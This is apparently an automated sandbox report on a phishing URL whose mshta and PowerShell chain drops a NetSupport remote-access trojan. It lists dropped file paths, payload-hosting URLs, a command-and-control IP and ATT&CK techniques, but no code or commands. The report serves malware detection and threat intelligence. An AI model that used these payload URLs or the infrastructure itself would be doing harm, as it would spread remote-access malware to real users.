                                  Source: Yara matchFile source: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000000.1975726137.0000000000D1F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7368, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure2
                                  Valid Accounts                                  		1
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		1
                                  Deobfuscate/Decode Files or Information                                  		1
                                  Input Capture                                  		2
                                  System Time Discovery                                  		Remote Services1
                                  Archive Collected Data                                  		1
                                  Data Obfuscation                                  		Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts4
                                  Native API                                  		2
                                  Valid Accounts                                  		2
                                  Valid Accounts                                  		3
                                  Obfuscated Files or Information                                  		LSASS Memory1
                                  Account Discovery                                  		Remote Desktop Protocol1
                                  Screen Capture                                  		13
                                  Ingress Tool Transfer                                  		Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts2
                                  Service Execution                                  		1
                                  Windows Service                                  		21
                                  Access Token Manipulation                                  		1
                                  Software Packing                                  		Security Account Manager3
                                  File and Directory Discovery                                  		SMB/Windows Admin Shares1
                                  Email Collection                                  		21
                                  Encrypted Channel                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell                                  		1
                                  Browser Extensions                                  		1
                                  Windows Service                                  		1
                                  DLL Side-Loading                                  		NTDS35
                                  System Information Discovery                                  		Distributed Component Object Model1
                                  Input Capture                                  		4
                                  Non-Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd11
                                  Registry Run Keys / Startup Folder                                  		13
                                  Process Injection                                  		1
                                  Masquerading                                  		LSA Secrets41
                                  Security Software Discovery                                  		SSH3
                                  Clipboard Data                                  		15
                                  Application Layer Protocol                                  		Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                  Registry Run Keys / Startup Folder                                  		2
                                  Valid Accounts                                  		Cached Domain Credentials2
                                  Process Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                  Virtualization/Sandbox Evasion                                  		DCSync31
                                  Virtualization/Sandbox Evasion                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                  Access Token Manipulation                                  		Proc Filesystem11
                                  Application Window Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                  Process Injection                                  		/etc/passwd and /etc/shadow1
                                  System Owner/User Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                                  Rundll32                                  		Network Sniffing1
                                  System Network Configuration Discovery                                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544089 URL: https://inspyrehomedesign.c... Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 46 traversecityspringbreak.com 2->46 48 inspyrehomedesign.com 2->48 50 geo.netsupportsoftware.com 2->50 68 Suricata IDS alerts for network traffic 2->68 70 Sigma detected: Powershell drops NetSupport RAT client 2->70 72 AI detected phishing page 2->72 74 4 other signatures 2->74 9 mshta.exe 16 2->9         started        12 chrome.exe 9 2->12         started        15 rundll32.exe 2->15         started        17 chrome.exe 2->17         started        signatures3 process4 dnsIp5 80 Suspicious powershell command line found 9->80 19 powershell.exe 15 22 9->19         started        64 192.168.2.16, 138, 443, 49698 unknown unknown 12->64 66 239.255.255.250 unknown Reserved 12->66 24 chrome.exe 12->24         started        signatures6 process7 dnsIp8 52 traversecityspringbreak.com 166.1.160.211, 49726, 80 ACEDATACENTERS-AS-1US United States 19->52 38 C:\Users\user\AppData\...\remcmdstub.exe, PE32 19->38 dropped 40 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 19->40 dropped 42 C:\Users\user\AppData\...\client32.exe, PE32 19->42 dropped 44 6 other files (5 malicious) 19->44 dropped 76 Uses ipconfig to lookup or modify the Windows network settings 19->76 78 Powershell drops PE file 19->78 26 client32.exe 17 19->26         started        30 cmd.exe 1 19->30         started        32 conhost.exe 19->32         started        34 ipconfig.exe 1 19->34         started        54 inspyrehomedesign.com 166.1.160.75, 443, 49698, 49699 ACEDATACENTERS-AS-1US United States 24->54 56 use.fontawesome.com 24->56 58 3 other IPs or domains 24->58 file9 signatures10 process11 dnsIp12 60 92.255.85.135, 443, 49729 SOVTEL-ASRU Russian Federation 26->60 62 geo.netsupportsoftware.com 172.67.68.212, 49730, 80 CLOUDFLARENETUS United States 26->62 82 Contains functionalty to change the wallpaper 26->82 84 Delayed program exit found 26->84 36 attrib.exe 1 30->36         started        signatures13 process14

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  No Antivirus matches

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLL3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLL3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL12%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLL3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\client32.exe13%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dll0%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dll3%ReversingLabs
                                  C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exe12%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  https://contoso.com/License0%URL Reputationsafe
                                  https://contoso.com/0%URL Reputationsafe
                                  https://nuget.org/nuget.exe0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                  https://go.micro0%URL Reputationsafe
                                  https://contoso.com/Icon0%URL Reputationsafe
                                  http://www.symauth.com/cps0(0%URL Reputationsafe
                                  http://www.symauth.com/rpa000%URL Reputationsafe
                                  https://aka.ms/pscore680%URL Reputationsafe
                                  http://crl.v0%URL Reputationsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  traversecityspringbreak.com
                                  		166.1.160.211
                                  		truetrue
                                    		unknown
                                    inspyrehomedesign.com
                                    		166.1.160.75
                                    		truetrue
                                      		unknown
                                      geo.netsupportsoftware.com
                                      		172.67.68.212
                                      		truefalse
                                        		unknown
                                        www.google.com
                                        		172.217.16.196
                                        		truefalse
                                          		unknown
                                          i.ibb.co
                                          		162.19.58.157
                                          		truefalse
                                            		unknown
                                            use.fontawesome.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://i.ibb.co/t8b1Qdw/1q.pngtrue
                                                		unknown
                                                http://geo.netsupportsoftware.com/location/loca.asptrue
                                                  		unknown
                                                  https://inspyrehomedesign.com/favicon.icotrue
                                                    		unknown
                                                    http://traversecityspringbreak.com/o/o.pngtrue
                                                      		unknown
                                                      https://inspyrehomedesign.com/true
                                                        		unknown
                                                        http://92.255.85.135/fakeurl.htmtrue
                                                          		unknown
                                                          https://inspyrehomedesign.com/Ray-verify.htmltrue
                                                            		unknown
                                                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://%s/testpage.htmwininet.dllclient32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drtrue
                                                                		unknown
                                                                http://www.protware.com/#mshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  http://geo.netsupportsoftware.com/location/loca.aspDclient32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                      		unknown
                                                                      https://inspyrehomedesign.com/Ray-verify.htmlEOBsOVUOCByEBKVfVxgwGKHgImTJOhITamshta.exe, 0000000B.00000003.1759981197.0000025C9831D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        		unknown
                                                                        http://www.pci.co.uk/supportsupportclient32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                          		unknown
                                                                          http://traversecityspringbreak.com/o/5.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            		unknown
                                                                            http://geo.netsupportsoftware.com/location/loca.asp1jclient32.exe, 00000015.00000002.2418160044.00000000061A2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              		unknown
                                                                              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                		unknown
                                                                                http://%s/testpage.htmclient32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drtrue
                                                                                  		unknown
                                                                                  http://traversecityspringbreak.com/o/3.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                    		unknown
                                                                                    https://inspyrehomedesign.com/Ray-verify.htmlhttps://inspyrehomedesign.com/Ray-verify.htmlmshta.exe, 0000000B.00000003.1759981197.0000025C98313000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      		unknown
                                                                                      http://traversecityspringbreak.compowershell.exe, 0000000C.00000002.1977374778.000002F201C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2021A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F2020EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        http://traversecityspringbreak.com/o/4.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C16000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          		unknown
                                                                                          http://%s/fakeurl.htmclient32.exe, client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.drtrue
                                                                                            		unknown
                                                                                            http://fontawesome.com/licensechromecache_83.1.drtrue
                                                                                              		unknown
                                                                                              http://traversecityspringbreak.com/o/7.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                		unknown
                                                                                                http://www.protware.com/mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  		unknown
                                                                                                  https://inspyrehomedesign.com/Ray-verify.htmlpmshta.exe, 0000000B.00000003.1762856955.0000025495615000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1763718088.0000025495627000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    		unknown
                                                                                                    http://fontawesome.comchromecache_83.1.drtrue
                                                                                                      		unknown
                                                                                                      http://www.protware.comv1mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        		unknown
                                                                                                        https://contoso.com/powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://inspyrehomedesign.com/Ray-verify.html_mshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          		unknown
                                                                                                          http://traversecityspringbreak.com/o/6.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C51000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                            		unknown
                                                                                                            https://inspyrehomedesign.com/mmshta.exe, 0000000B.00000003.1762367642.0000025495694000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                              		unknown
                                                                                                              http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                                                		unknown
                                                                                                                https://inspyrehomedesign.com/Ray-verify.htmlINetCookiesmshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                                                    		unknown
                                                                                                                    https://inspyrehomedesign.com/Ray-verify.htmldmshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      		unknown
                                                                                                                      http://traversecityspringbreak.com/o/11.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                        		unknown
                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2011951167.000002F210073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.pci.co.uk/supportclient32.exe, 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                                                          		unknown
                                                                                                                          https://inspyrehomedesign.com/Ray-verify.htmlVVC:mshta.exe, 0000000B.00000002.1767795536.0000025C9A7ED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            		unknown
                                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              		unknown
                                                                                                                              https://go.micropowershell.exe, 0000000C.00000002.1977374778.000002F200E4D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://traversecityspringbreak.com/o/9.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                		unknown
                                                                                                                                https://contoso.com/Iconpowershell.exe, 0000000C.00000002.2011951167.000002F2101B3000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://inspyrehomedesign.com/Nmshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1764062895.0000025495669000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                  		unknown
                                                                                                                                  http://traversecityspringbreak.com/o/8.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                    		unknown
                                                                                                                                    http://traversecityspringbreak.com/o/10.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      		unknown
                                                                                                                                      http://127.0.0.1client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drtrue
                                                                                                                                        		unknown
                                                                                                                                        https://inspyrehomedesign.com/Ray-verify.html...Imshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          		unknown
                                                                                                                                          https://inspyrehomedesign.com/Ray-verify.html...Pmshta.exe, 0000000B.00000002.1766417078.0000025C98228000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                            		unknown
                                                                                                                                            http://www.symauth.com/cps0(powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drtrue
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1977374778.000002F200222000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                              		unknown
                                                                                                                                              http://www.protware.commshta.exe, 0000000B.00000003.1756113861.00000254956E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1757874634.0000025C98246000.00000004.00000020.00020000.00000000.sdmp, Ray-verify[1].htm.11.dr, chromecache_88.1.drtrue
                                                                                                                                                		unknown
                                                                                                                                                http://geo.netsupportsoftware.com/location/loca.asphnclient32.exe, 00000015.00000003.2277891273.00000000013DB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  		unknown
                                                                                                                                                  http://traversecityspringbreak.com/o/2.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.symauth.com/rpa00powershell.exe, 0000000C.00000002.1977374778.000002F201C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F202118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, pcicapi.dll.12.dr, HTCTL32.DLL.12.dr, PCICHEK.DLL.12.dr, TCCTL32.DLL.12.dr, PCICL32.DLL.12.drtrue
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://inspyrehomedesign.com/Ray-verify.htmldVmshta.exe, 0000000B.00000002.1764062895.0000025495638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                      		unknown
                                                                                                                                                      http://traversecityspringbreak.comppowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                        		unknown
                                                                                                                                                        https://inspyrehomedesign.com/Ray-verify.html#?mshta.exe, 0000000B.00000002.1765266374.0000025495940000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1768096542.0000025C9C990000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                          		unknown
                                                                                                                                                          https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1977374778.000002F200001000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://traversecityspringbreak.com/o/1.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1977374778.000002F201A68000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                            		unknown
                                                                                                                                                            http://traversecityspringbreak.com/o/12.pngpowershell.exe, 0000000C.00000002.1977374778.000002F201623000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                              		unknown
                                                                                                                                                              http://crl.vpowershell.exe, 0000000C.00000002.2018709421.000002F279A3A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown

                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              166.1.160.211
                                                                                                                                                              		traversecityspringbreak.comUnited States
                                                                                                                                                              		11798ACEDATACENTERS-AS-1UStrue
                                                                                                                                                              172.67.68.212
                                                                                                                                                              		geo.netsupportsoftware.comUnited States
                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                              162.19.58.157
                                                                                                                                                              		i.ibb.coUnited States
                                                                                                                                                              		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                                                                                              239.255.255.250
                                                                                                                                                              		unknownReserved
                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                              92.255.85.135
                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                              		42097SOVTEL-ASRUtrue
                                                                                                                                                              166.1.160.75
                                                                                                                                                              		inspyrehomedesign.comUnited States
                                                                                                                                                              		11798ACEDATACENTERS-AS-1UStrue
                                                                                                                                                              172.217.16.196
                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                              169.197.85.95
                                                                                                                                                              		unknownUnited States
                                                                                                                                                              		26548PUREVOLTAGE-INCUSfalse

                                                                                                                                                              Private

                                                                                                                                                              IP
                                                                                                                                                              192.168.2.16

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1544089
                                                                                                                                                              Start date and time:2024-10-28 19:44:45 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 6m 46s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                              Sample URL:https://inspyrehomedesign.com/Ray-verify.html
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:23
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.rans.phis.troj.evad.win@30/39@14/9
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 52%
                                                                                                                                                              • Number of executed functions: 127
                                                                                                                                                              • Number of non-executed functions: 249

                                                                                                                                                              Warnings

                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.110, 74.125.133.84, 142.250.185.163, 34.104.35.123, 93.184.221.240, 172.67.142.245, 104.21.27.152, 142.250.186.99, 2.19.126.163, 216.58.206.46
